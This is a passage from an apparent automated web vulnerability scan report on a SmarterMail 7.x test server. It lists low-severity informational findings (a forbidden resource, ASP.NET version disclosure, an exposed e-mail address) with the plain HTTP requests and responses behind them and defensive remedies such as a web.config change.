WebForm_AutoFocus('ctl00_MPH_txtUserName');Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>

Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /App_Themes/Default/ButtonBarIcons.xml

/App_Themes/Default/ButtonBarIcons.xml CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/App_Themes/Default/ButtonBarIcons.xml

Request

GET /App_Themes/Default/ButtonBarIcons.xml HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/App_Themes/Default/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:54 GMT
Content-Length: 1208
Connection: Close


<html>
<head>
<title>Forbidden</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: 8pt}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3925.24451

</font>

</body>
</html>
ASP.NET Version Disclosure

ASP.NET Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the ASP.NET version in the HTTP response. This information can help an attacker develop further attacks, and the system can also become an easier target for automated attacks. The version was leaked from the X-AspNet-Version header of the HTTP response or from a default ASP.NET error page.

Impact

An attacker can use the disclosed information to look up known security vulnerabilities for the identified version. The attacker can also use this information in conjunction with other vulnerabilities in the application or web server.

Remedy

Apply the following changes to your web.config file to prevent information leakage, by using custom error pages and removing X-AspNet-Version from HTTP responses (element names in web.config are case-sensitive).
<system.web>
     <httpRuntime enableVersionHeader="false" />
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</system.web>

Remedy References

- /

/

http://vulnerable.smartermail.7.x.host:9998/

Extracted Version

X-AspNet-Version: 2.0.50727

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=rzf1kd55owkddk45aac20t45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3294
Connection: Close



E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam engines and brute-force tools. Furthermore, valid e-mail addresses may lead to social engineering attacks.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications and remove person-specific e-mail addresses from the web site; where a contact channel is required, use submission forms for this purpose.

External References

- /

/

http://vulnerable.smartermail.7.x.host:9998/

Found E-mails

user@example.com

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: vulnerable.smartermail.7.x.host:9998
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:33:21 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=rzf1kd55owkddk45aac20t45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3294
Connection: Close

